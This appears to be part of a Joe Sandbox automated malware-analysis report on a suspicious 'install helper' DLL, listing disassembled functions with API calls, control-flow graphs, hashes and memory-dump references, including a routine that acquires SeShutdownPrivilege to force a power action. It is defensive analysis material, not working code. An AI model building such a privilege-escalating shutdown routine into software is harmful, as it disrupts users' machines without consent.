                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: 6c0202d9991ba93421b471cd687a406639ae9e33ea1e4ac035c7ca4745908f2a
                              • Instruction ID: ae39628355321c34c121ba4c97026536267193a629dfd17de58a64690295ef6b
                              • Opcode Fuzzy Hash: 6c0202d9991ba93421b471cd687a406639ae9e33ea1e4ac035c7ca4745908f2a
                              • Instruction Fuzzy Hash: A551C575A8020EAFDB01DFA8C840FEFFB79EF0A359F540451ED20A7A51D770994687A1
                              Function 6C2E5B90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7654 6c2e5b90-6c2e5b9c 7655 6c2e5b9e-6c2e5ba9 7654->7655 7656 6c2e5bdd 7654->7656 7657 6c2e5bbf-6c2e5bcc call 6c1b01f0 call 6c2f0b18 7655->7657 7658 6c2e5bab-6c2e5bbd 7655->7658 7659 6c2e5bdf-6c2e5c57 7656->7659 7668 6c2e5bd1-6c2e5bdb 7657->7668 7658->7657 7660 6c2e5c59-6c2e5c81 7659->7660 7661 6c2e5c83-6c2e5c89 7659->7661 7660->7661 7663 6c2e5c8a-6c2e5d49 call 6c1b2250 call 6c1b2340 call 6c2e9379 call 6c1ae010 call 6c2e7088 7660->7663 7668->7659
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C2E5D31
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925
                              • Opcode ID: f67d5e8eb4b985f96fd1bc4365d48cea272dd001ff5b6367efbae5b13d4d5fd5
                              • Instruction ID: 234ad5fbefcc68e04253ec601c5841c0d51551bd95eab5af54b54144f073b569
                              • Opcode Fuzzy Hash: f67d5e8eb4b985f96fd1bc4365d48cea272dd001ff5b6367efbae5b13d4d5fd5
                              • Instruction Fuzzy Hash: 575153B5A00B048FD729CF29C481B97BBF1BB48318F408A2DD8865BB90D775B909CF90
                              Function 6C2FB925 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7699 6c2fb925-6c2fb939 call 6c3015a2 7702 6c2fb93f-6c2fb947 7699->7702 7703 6c2fb93b-6c2fb93d 7699->7703 7705 6c2fb949-6c2fb950 7702->7705 7706 6c2fb952-6c2fb955 7702->7706 7704 6c2fb98d-6c2fb9ad call 6c30171f 7703->7704 7716 6c2fb9af-6c2fb9b9 call 6c2ef9f2 7704->7716 7717 6c2fb9bb 7704->7717 7705->7706 7707 6c2fb95d-6c2fb971 call 6c3015a2 * 2 7705->7707 7708 6c2fb957-6c2fb95b 7706->7708 7709 6c2fb973-6c2fb983 call 6c3015a2 CloseHandle 7706->7709 7707->7703 7707->7709 7708->7707 7708->7709 7709->7703 7720 6c2fb985-6c2fb98b GetLastError 7709->7720 7718 6c2fb9bd-6c2fb9c0 7716->7718 7717->7718 7720->7704
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C30425F), ref: 6C2FB97B
                              • GetLastError.KERNEL32(?,00000000,?,6C30425F), ref: 6C2FB985
                              • __dosmaperr.LIBCMT ref: 6C2FB9B0
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0
                              • Opcode ID: 52f9badbf6fd36f2b9b7cf64ed6abc6373cc353fc12cfabef69fb9264a05a0ee
                              • Instruction ID: 71f6148db0aa2551ec0601323c25480708c06786d772ee607d45d5039b8af92f
                              • Opcode Fuzzy Hash: 52f9badbf6fd36f2b9b7cf64ed6abc6373cc353fc12cfabef69fb9264a05a0ee
                              • Instruction Fuzzy Hash: 01012B33B8512C1AC600963A9845BADB7AD4F83B3DF694359FC758BEC0DB60C94A8A51
                              Function 6C2F0B9C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7944 6c2f0b9c-6c2f0ba7 7945 6c2f0bbe-6c2f0bcb 7944->7945 7946 6c2f0ba9-6c2f0bbc call 6c2ef9cc call 6c2f0120 7944->7946 7948 6c2f0bcd-6c2f0be2 call 6c2f0cb9 call 6c2f873e call 6c2f9c60 call 6c2fb898 7945->7948 7949 6c2f0c06-6c2f0c0f call 6c2fae75 7945->7949 7957 6c2f0c10-6c2f0c12 7946->7957 7963 6c2f0be7-6c2f0bec 7948->7963 7949->7957 7964 6c2f0bee-6c2f0bf1 7963->7964 7965 6c2f0bf3-6c2f0bf7 7963->7965 7964->7949 7965->7949 7966 6c2f0bf9-6c2f0c05 call 6c2f47bb 7965->7966 7966->7949
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction ID: 77259721ce02a57df4a445b37c6eaebd4517e31056985ca5e806794fb54ef5c1
                              • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction Fuzzy Hash: A4F0DC725C175C6AD6211A2A8D00BCBB2A89F8237DF200715ECB497ED0DB70940B8BA1
                              Function 6C2E5960 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                              Download Yara Rule
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C2E5AB4
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C2E5AF4
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              • Opcode ID: 70b5295480f5560892d8f5bbb5c7fc1aa51f7b99e9a5de71776775192dab0c49
                              • Instruction ID: 0cbf3cb803980b2295660e76fbf06dfce17ecd9060bf589fe2e40916fa5f826f
                              • Opcode Fuzzy Hash: 70b5295480f5560892d8f5bbb5c7fc1aa51f7b99e9a5de71776775192dab0c49
                              • Instruction Fuzzy Hash: B9514875211B04DBE725CF25C484BD6BBE4BB08718F448A1CE9AA5BB91DB30F549CB80
                              Function 6C2EEF3F Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(6C316DD8,0000000C), ref: 6C2EEF52
                              • ExitThread.KERNEL32 ref: 6C2EEF59
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: 2b8b68d0185ef28905bdcb69da9b3f8ead87d4d034e1021b3168159df9b98e2b
                              • Instruction ID: 36bc7f084a7875837e2e80c67bd8bd233f8cb98339042f7acc5745242aff1cfa
                              • Opcode Fuzzy Hash: 2b8b68d0185ef28905bdcb69da9b3f8ead87d4d034e1021b3168159df9b98e2b
                              • Instruction Fuzzy Hash: C8F0C2B5A4060CAFDF04AFB0C409AAE7B78FF45319F244649E815A7B41CF755906CFA1
                              Function 6C2FAF72 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: 641fb041f8b0a25d13cf40cd748b45734cf5153e1432fdabc9cbb0deabd27556
                              • Instruction ID: cdfbd7df002d920db229a9294d77a58dcb24c111738dc68c14c321061089edb2
                              • Opcode Fuzzy Hash: 641fb041f8b0a25d13cf40cd748b45734cf5153e1432fdabc9cbb0deabd27556
                              • Instruction Fuzzy Hash: 0A118C71A0420EAFCF05CF59E945D9B7BF9EF48304F004059F814AB301D631E911CBA4
                              Function 6C303FFE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction ID: af4b2e3ce9aea144d3c6894fc030911adaa5685873841f986adc815a442704f1
                              • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction Fuzzy Hash: 50012872D0115DAFCF029FA88D00AEEBFB9AB18214F144165AD24F26A0E7318A25DB91
                              Function 6C304457 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000000,?,6C304115,?,?,00000000,?,6C304115,00000000,0000000C), ref: 6C304474
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 24fd705929f3b6ae03e5521d87b0286eb151d88419268b62a0e0d950aa1c79c6
                              • Instruction ID: 1b254b7fcd3526189b8043b81721e60ea202bde090e2a3962b8991108b7f3105
                              • Opcode Fuzzy Hash: 24fd705929f3b6ae03e5521d87b0286eb151d88419268b62a0e0d950aa1c79c6
                              • Instruction Fuzzy Hash: A7D06C3210010DBFDF028E84DC06EDA3BAAFB88714F018000BA5866020C732E971AB90
                              Function 6C1B7F40 Relevance: 1.5, APIs: 1, Instructions: 1COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction ID: bf24b7f5003961f6364638f2132460500347d0e5d5a88e9aace220a6190adfdc
                              • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction Fuzzy Hash:

                              Non-executed Functions

                              Function 6C2E1880 Relevance: 10.5, APIs: 3, Strings: 1, Instructions: 3538COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: g)''
                              • API String ID: 4218353326-3487984327
                              • Opcode ID: 9f19ac9f07dd5ced80103f670decb9ab454692c5f22baee37e14bb1ef69d6d02
                              • Instruction ID: 85709a7cefe0e4a6357ad9877e8e648f6cc6f4c4e1776fe50506c75b41c60297
                              • Opcode Fuzzy Hash: 9f19ac9f07dd5ced80103f670decb9ab454692c5f22baee37e14bb1ef69d6d02
                              • Instruction Fuzzy Hash: 30633571644B068FC728CF28C8C0A95B3F3BFC93197998A6DC8D65BA55E774B44ACB40
                              Function 6C2E5D60 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 31nativeshutdownCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 6C2E5D6A
                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C2E5D76
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C2E5D84
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C2E5DAB
                              • NtInitiatePowerAction.NTDLL ref: 6C2E5DBF
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3256374457-3733053543
                              • Opcode ID: 6258f97c2c8a7c979bd6d2aafcf8d3ab70230cca2b6ee81ae8a6483909694b40
                              • Instruction ID: 8cf84d185720a2c63df7f62e461e7cbdc88626c5303bc80bd5ddc554114a7b88
                              • Opcode Fuzzy Hash: 6258f97c2c8a7c979bd6d2aafcf8d3ab70230cca2b6ee81ae8a6483909694b40
                              • Instruction Fuzzy Hash: E2F0B470A44300BBEA507BA4DD0EB5A7BBCEF4D701F014509F985AA0C1D7706894CB96
                              Function 6C161950 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 594COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: \j`7$\j`7$j
                              • API String ID: 0-3644614255
                              • Opcode ID: 77e8f18237a1cf5401fbed5ac80cba6fcfe741d288a4b2f1991248522dbdab0a
                              • Instruction ID: bc1f27d5dae569488d7618112c310858a21bfd705734711c7a6efaaf63c1aeb6
                              • Opcode Fuzzy Hash: 77e8f18237a1cf5401fbed5ac80cba6fcfe741d288a4b2f1991248522dbdab0a
                              • Instruction Fuzzy Hash: 904223746093828FCB14CF6AC48066ABBE1AFDA358F244A1EE496C7B61D334D855CF53
                              Function 6C3784AC Relevance: 8.7, APIs: 1, Strings: 3, Instructions: 1656COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C3784B1
                                • Part of subcall function 6C37993B: __EH_prolog.LIBCMT ref: 6C379940
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 1$`)K$h)K
                              • API String ID: 3519838083-3935664338
                              • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction ID: 11a4ac271c1c4a04244c2e1810b4b26e554a92642f769430193210932bee10be
                              • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction Fuzzy Hash: DBF28D30D04248DFDF21CFA8C888BDDBBB5AF49318F244199D449AB781DB799A85CF25
                              Function 6C36AEEF Relevance: 8.3, APIs: 1, Strings: 2, Instructions: 3058COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C36AEF4
                                • Part of subcall function 6C36E622: __EH_prolog.LIBCMT ref: 6C36E627
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $h%K
                              • API String ID: 3519838083-1737110039
                              • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                              • Instruction ID: e182c2e021be56a7a65eae63b9f3fe7412b8b4a7cd30830187b7da9eb1a1f994
                              • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                              • Instruction Fuzzy Hash: EE538A30901258DFDF15CFA5C994BDDBBB4AF09308F244098D489ABB95CB719E89CF62
                              Function 6C37C7F3 Relevance: 6.8, APIs: 1, Strings: 2, Instructions: 1546COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $J
                              • API String ID: 3519838083-1755042146
                              • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                              • Instruction ID: b7d86f0f06930407e60a8e03da2bbd2b15586c9e55b9f8a8352f2e308c0ed0fd
                              • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                              • Instruction Fuzzy Hash: 0FE2EE30905289DFEF21CFA8C598BDDBBB4AF05308F248089E855AB681CB79D945CF75
                              Function 6C346CE0 Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1923COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C346CE5
                                • Part of subcall function 6C31CC2A: __EH_prolog.LIBCMT ref: 6C31CC2F
                                • Part of subcall function 6C31E6A6: __EH_prolog.LIBCMT ref: 6C31E6AB
                                • Part of subcall function 6C346A0E: __EH_prolog.LIBCMT ref: 6C346A13
                                • Part of subcall function 6C346837: __EH_prolog.LIBCMT ref: 6C34683C
                                • Part of subcall function 6C34A143: __EH_prolog.LIBCMT ref: 6C34A148
                                • Part of subcall function 6C34A143: ctype.LIBCPMT ref: 6C34A16C
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog$ctype
                              • String ID:
                              • API String ID: 1039218491-3916222277
                              • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction ID: 74395eb31bce4cb07c7ced2c30c5087347a814e46c489951600b2aee33d96ede
                              • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction Fuzzy Hash: CD03AD30805298DEDF15CFA4C950BDCBBF1AF16308F24809AD489A7A91DB745B8DDF62
